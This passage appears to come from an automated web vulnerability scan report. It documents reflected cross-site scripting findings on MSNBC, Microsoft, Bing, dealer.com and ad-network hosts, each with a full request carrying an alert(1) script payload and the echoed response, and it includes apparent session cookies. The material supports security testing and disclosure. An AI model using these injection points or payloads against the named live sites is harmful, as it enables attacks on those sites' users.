Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; TZM=-300; SSLB=0; s_cc=true; jt_time=1303570152423; s_sq=msnbcnewsvine%2Cmsnbcom%3D%2526pid%253DStoryBlog%25257CTechnology%25257CTech%252520and%252520g%25257Ca6497264%25257CMini%252520crossbow%252520shoots%252520flaming%252520firework%252520darts%25257Cp1%2526pidt%253D1%2526oid%253Dhttp%25253A//gadgetbox.msnbc.msn.com/_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts%252523%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 23 Apr 2011 14:49:26 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 90175

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Gadgetbox - Mini crossbow
...[SNIP]...
<input type="hidden" name="redirect" value="http://gadgetbox.msnbc.msn.com/_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts?9386e"><script>alert(1)</script>d85df39341=1" />
...[SNIP]...

2.29. http://gadgetbox.msnbc.msn.com/_vine/printer [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetbox.msnbc.msn.com
Path:   /_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 54d54<img%20src%3da%20onerror%3dalert(1)>ebff4bedb1c was submitted in the path parameter. This input was echoed as 54d54<img src=a onerror=alert(1)>ebff4bedb1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=gadgetbox&path=/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts54d54<img%20src%3da%20onerror%3dalert(1)>ebff4bedb1c HTTP/1.1
Host: gadgetbox.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://gadgetbox.msnbc.msn.com/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; TZM=-300; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Length: 550
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sat, 23 Apr 2011 14:25:41 GMT
Connection: close
Vary: Accept-Encoding

{"cpk":{"version":"23845"},"conf":{"matchPath":"","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vine","defaultAvatar":"m
...[SNIP]...
false,"section":{"type":"g","contentSetId":"40584030","domainName":"gadgetbox","displayName":"Gadgetbox","avatar":null,"path":"\/_news\/2011\/04\/19\/6497264-mini-crossbow-shoots-flaming-firework-darts54d54<img src=a onerror=alert(1)>ebff4bedb1c"},"revision":"23845"}

2.30. http://googlev8.dealer.com/smgmap-static.htm [startingZoom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap-static.htm

Issue detail

The value of the startingZoom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9e0"><script>alert(1)</script>352e8afc084 was submitted in the startingZoom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap-static.htm?accountId=lewisautos&startingZoom=129e9e0"><script>alert(1)</script>352e8afc084&locale=en_US HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:53:44 GMT
Connection: close
Set-Cookie: ssoid=831111d60a0a00ed0170c7a3d9b58ea7;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 433

                                                                                               
<style type="text/css">
/*<![CDATA[*/
   body{ margin: 0; padding: 0; }
   img{ display: block; }
/*]]>*/
</style>

<img id="gmapStatic" src="http://maps.google.com/staticmap?size=320x210&amp;markers=44.434437,-73.210659,red&amp;zoom=129e9e0"><script>alert(1)</script>352e8afc084&amp;sensor=false&amp;key=ABQIAAAAm31L2WgUj0QyLU9emYKpdxTyucrRjepA0dMQxaDGF2nYV4cV2hQtpUMphJPznp8ItAldMikruPmfuQ" alt="" />
...[SNIP]...

2.31. http://i.microsoft.com/en-us/homepage/bimapping.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.microsoft.com
Path:   /en-us/homepage/bimapping.js

Issue detail

The value of the v request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1a9d6%3balert(1)//aee147c7321 was submitted in the v parameter. This input was echoed as 1a9d6;alert(1)//aee147c7321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/homepage/bimapping.js?v=BiMapping1a9d6%3balert(1)//aee147c7321&k=/en-us/homepage/Components/BiMapping.xml&ver=1.0.0 HTTP/1.1
Host: i.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/19/2011 11:25:31&Microsoft.VisitStartDate=04/19/2011 11:23:33&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=4&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; RioTracking.CellCode=200007735; RioTracking.Organic=1; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303555144152:ss=1303555133331; RioTracking.EndActionCode=300010839; OnlineTrackingV2.0=CATC=400247328&CTC=200007735; MS0=976ae7bc5be74b50be720b325cdc0569

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Last-Modified: Sat, 12 Mar 2011 01:58:04 GMT
ETag: "TGHEyp+ivmBRd5HElAkGJPBy80U="
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438964810800000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: public, max-age=600
Expires: Sat, 23 Apr 2011 13:59:11 GMT
Date: Sat, 23 Apr 2011 13:49:11 GMT
Connection: close
Content-Length: 2103

...var BiMapping1a9d6;alert(1)//aee147c7321={"Webtrends":{"enabled":true,"settings":{"interactiontype":{"0":true,"1":true,"2":true,"3":true,"4":true,"5":true,"6":true,"7":true,"8":true,"9":true,"10":true,"11":true,"12":true,"13":true,"14":true,
...[SNIP]...

2.32. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0257'-alert(1)-'1d65a39e68a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=MzMzMzMzA0BI4XoUrkcBQAAAAAAAAABASOF6FK5HAUAzMzMzMzMDQPUMgmY50zQASsYda6b2ziULkbNNAAAAAK7tAADLAQAAGgEAAAIAAACD3QQAhWQAAAEAAABVU0QAVVNEANgCWgAZFokDsg4BAgUCAAQAAAAAWBt0FgAAAAA.&tt_code=vert-15&udj=uf%28%27a%27%2C+2317%2C+1303613744%29%3Buf%28%27c%27%2C+63793%2C+1303613744%29%3Buf%28%27r%27%2C+318851%2C+1303613744%29%3B&cnd=!1BNlHQix8gMQg7sTGAAghckBKIkHMTQzMzMzMwNAQhMIABAAGAAgASj-__________8BSABQAFiZLGAAaJoCd0257'-alert(1)-'1d65a39e68a&referrer=http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/&pp=9FD4EC90B5C5CE8F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5EfErkX00s]#%2L_'x%SEV/i#-BS4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzA6-ss1ro'nQbiB4iL#@WoF8*q+%8Ck(Z3co?dyLQh0@6TKK-*L:%LQc0KPP-c*78]Jv/eZc3uvQC6q``1N6p(m049Jmn`V9t>QhMj!HjDo5]s)G-(O-%mSwdj6E*mM.>wnu4RgaTx8L85eBy@1cmd#TjMSFHhH?CKGG).w$E$fK=+G=8CNE:N(LZ6vB3bbu>7P!U1PE:+FT-:Y@6U@6u@Qh

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PErkX00s]#%2L_'x%SEV/i#+hC4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzA6-ss1ro'nQbiB4iL#@WoF8*q+%8Ck(Z3co?dyLQh0@6TKK-*L:%LQc0KPOtwh*#Idf1b-0mblYuW#YoWapds8JCvl*MM4t<v#RguUj2DKDc_kw579.tS]!Buu*UhVOvuR!wc1Mto<c]C_i%cwI56_oaKuURO+jVQ]>x9ZA3%-+ha%WWdt(<CYrwlBy9*)'tz)U.+wC'cEc9uMFNt9os87@P@(EU[>Fu<>XZ<4; path=/; expires=Sat, 23-Jul-2011 03:13:50 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 03:13:50 GMT
Content-Length: 5240

(function(){var flashAd='<OBJECT id="14868942275349749" data="http://cdn.adnxs.com/p/ac/a3/7a/ab/aca37aab3a60d68d49df97f0e4704b0e.swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="728"
...[SNIP]...
zQASsYda6b2ziULkbNNAAAAAK7tAADLAQAAGgEAAAIAAACD3QQAhWQAAAEAAABVU0QAVVNEANgCWgAZFokDsg4BAgUCAAQAAAAAtx9HMwAAAAA./cnd=!1BNlHQix8gMQg7sTGAAghckBKIkHMTQzMzMzMwNAQhMIABAAGAAgASj-__________8BSABQAFiZLGAAaJoCd0257'-alert(1)-'1d65a39e68a/referrer=http%3A%2F%2Fwww2.wspa.com%2Fnews%2F2011%2Fapr%2F22%2Fcomputer-hackers-strike-more-often-2011-ar-1751321%2F/clickenc=http%3A%2F%2Fwww.travelleaders.com%2Ftravelleaders%2FVacationTravel%2FLoca
...[SNIP]...

2.33. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 11db5<script>alert(1)</script>30c2ff40425 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H1097211db5<script>alert(1)</script>30c2ff40425 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsiPus_3Rvr="MLsXrt8vcS5joAD3TrInbg01LBacmsyl/AQEm6jOjyJqA6EpRXeNR51ybx4rDnCLA/gpu7O7IlAhfzML1bVu8LmHQFSbNcINu1toeEE5kG4lJztdJWI+ba2Q78/jsN+/TlufR9gxXgcR0KMzGJpQAPViuoDXhoAPiFIbHFlNxrqXuwN+xQ650NaUnO1HQ1TC3/173MNSUStg+GcKR4V6DW0TDxufsig2SmtwNKPo/CVSVPlw/2PcAjnGoIKfn96Cy/3cT7qEL7188CCOYVNsOqmkfmiHO0dzVprkHujLnpoQjW13ASg9Stbn7mHurO97LPG0rYCNdYAScMQ="; rsi_us_1000000="pUMdJUmnOBIUlU3AYd6I3CK7z/6DmSuGrhprSQdhBfcX3Bf9Q65g5VpPGcLX2sU1kVDV045frkfYy5Br7miNnNQwIJ50CTWAvaYYGfrlF0/bucCm8HXwQm2UlwXVNuqjF1bW/O+qa97E9yLqh63io2VEQiSrjWc+4QdXD8jYF9BIN/9B2POg2Qo9Ay/zMsrzWsjpzHuGG6hUr8HuElIQy9fBZ5ihJZtRNDYALRkRiTc3nWQnJ+hpt4MzZEz2tZKlPI28GS+PTu7QmfVUvLSS1+JAcFSTY2aJRNgJl5XPPWfs4+quYrigip3tf3nwvQs2vAofrBcZ5z9sF824xRe2LCzYaZW25Iu3WVLM5ZjVodFco02zbjREKJbsIlUGB8Atb9HFC6YCcsOHh2uBI6lJHDfsPvKoGNSYSL7TNUVmeUKoJY8ro+d9lOGFJWEKeGDMCwPrX/g+HCLXp0RhPMtDqBUGgjlcG/Ud8LowgmubueoF9IkukAa0rKObKiW5Q24em8YBstnU842LfaUN5Tf6QLodj7PVE2neT0J6IKSKHqk/pdg1xAteXpgdBXLZQdHV8gNjxjhBME3ZnZWY1SZNo1ePRFpQVx+b/9IC4aKar3PeWVeh/uWoR3B+NYEqDWNfhywIQZ4Bp7CIM91FSjI3h8nTySszYjASr3fOoimoaqOtUp/Drk4R5tepvhL8Ka9L5umM9LigL1RGl7lfgrGdYdlPOFuDG6au0u3Dta/J3iLcr4ltfCDkrk+BQilQqvQgMwVvwKo4n8oN7bNoffMkAbQt0PEphVMVWK7fqWF9zGYV5C9m/XjP+4cFtGZ7bVRUcfd0FSV4+IiWGv1ib7aNhID3Q5wa6eovA7QV6YPCeZ0BWI2gY/hCCXs/pj1fbU/xwIl5wkcHjM8lskScNJdVnojLyQQZeXHVlY6gcidrk4M="; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxIcq2FNOs3dJs0lUAJpDPlvN//lxCH/uYAwhrfLSEX/QGzTHrLpVcsD2WuAUdkGz6y/8O3Ed+Hq3bYHDGvt4svjGm0Mpre/ONJrQAdw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 24 Apr 2011 03:10:17 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 25 Apr 2011 03:10:17 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:10:16 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H1097211DB5<SCRIPT>ALERT(1)</SCRIPT>30C2FF40425" was not recognized.
*/

2.34. http://m.bing.com/search/search.aspx [Q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.bing.com
Path:   /search/search.aspx

Issue detail

The value of the Q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20c0"style%3d"x%3aexpression(alert(1))"edf8f6f1e85 was submitted in the Q parameter. This input was echoed as c20c0"style="x:expression(alert(1))"edf8f6f1e85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/search.aspx?A=modifylocation&PA=1&SI=0&Q=mapc20c0"style%3d"x%3aexpression(alert(1))"edf8f6f1e85&REDIRURL=%252fsearch%252fsearch.aspx%253fA%253dresults%2526Q%253dmap%2526D%253d%2526PA%253d1&TL=1 HTTP/1.1
Host: m.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: utmz=Sat%20Apr%2023%202011%2008%3A44%3A41%20GMT-0500%20%28Central%20Daylight%20Time%29%3B300; LC=en-us; MKT2=en-us; UI2=en-us; CR=1; UM=0; _SS=SID=9E8D54D7F0934D288FF126B397747EB3; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHUID=V=2&GUID=29817B0315F249289E79FDBE52943C09; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; utmz=Sat%20Apr%2023%202011%2008%3A36%3A56%20GMT-0500%20%28Central%20Daylight%20Time%29%3B300; SRCHD=SM=1&D=1740336&MS=1740336&AF=NOFORM; MUID=4e4dcb1f5c4948d8b39c2c31015bf13b; SID=4639966124919720556

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache,no-cache
Content-Type: application/xhtml+xml; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 13:44:50 GMT
Connection: close
Set-Cookie: MUID=4e4dcb1f5c4948d8b39c2c31015bf13b; expires=Tue, 23-Oct-2012 13:44:50 GMT; path=/
Set-Cookie: SID=4639966124919720556; expires=Sat, 23-Apr-2011 13:49:50 GMT; path=/
Content-Length: 4500

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<input id="Q" type="hidden" name="Q" value="mapc20c0"style="x:expression(alert(1))"edf8f6f1e85"/>
...[SNIP]...

2.35. http://m.bing.com/search/search.aspx [REDIRURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.bing.com
Path:   /search/search.aspx

Issue detail

The value of the REDIRURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17897"style%3d"x%3aexpression(alert(1))"a2cf0c13c07 was submitted in the REDIRURL parameter. This input was echoed as 17897"style="x:expression(alert(1))"a2cf0c13c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/search.aspx?A=searchsettings&SI=0&REDIRURL=%252fsearch%252fsearch.aspx%253fA%253dstart17897"style%3d"x%3aexpression(alert(1))"a2cf0c13c07 HTTP/1.1
Host: m.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: utmz=Sat%20Apr%2023%202011%2008%3A44%3A49%20GMT-0500%20%28Central%20Daylight%20Time%29%3B300; LC=en-us; MKT2=en-us; UI2=en-us; CR=1; UM=0; SRCHUID=V=2&GUID=29817B0315F249289E79FDBE52943C09; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; utmz=Sat%20Apr%2023%202011%2008%3A36%3A56%20GMT-0500%20%28Central%20Daylight%20Time%29%3B300; MUID=4e4dcb1f5c4948d8b39c2c31015bf13b; SID=4639966124919720556; _FS=mkt=en-US; _HOP=; _UR=HP=; MUID=5C4107AD436041918F34CEDC2D53EB3B; OrigMUID=5C4107AD436041918F34CEDC2D53EB3B%2c984596214ec74e1e88afb2386c4713a4; _SS=SID=9E8D54D7F0934D288FF126B397747EB3&CW=1074&CH=899&bIm=515; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; RMS=F=Gg&A=AAAAAAAAAAAQ

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache,no-cache
Content-Type: application/xhtml+xml; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 13:44:58 GMT
Connection: close
Set-Cookie: MUID=5C4107AD436041918F34CEDC2D53EB3B; expires=Tue, 23-Oct-2012 13:44:58 GMT; path=/
Set-Cookie: SID=4639966124919720556; expires=Sat, 23-Apr-2011 13:49:58 GMT; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; expires=Mon, 22-Apr-2013 13:44:57 GMT; domain=.bing.com; path=/
Content-Length: 6699

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<input type="hidden" name="REDIRURL" value="%2fsearch%2fsearch.aspx%3fA%3dstart17897"style="x:expression(alert(1))"a2cf0c13c07"/>
...[SNIP]...

2.36. http://player.stv.tv/favicon.ico [REST URL parameter 1]  previous  next

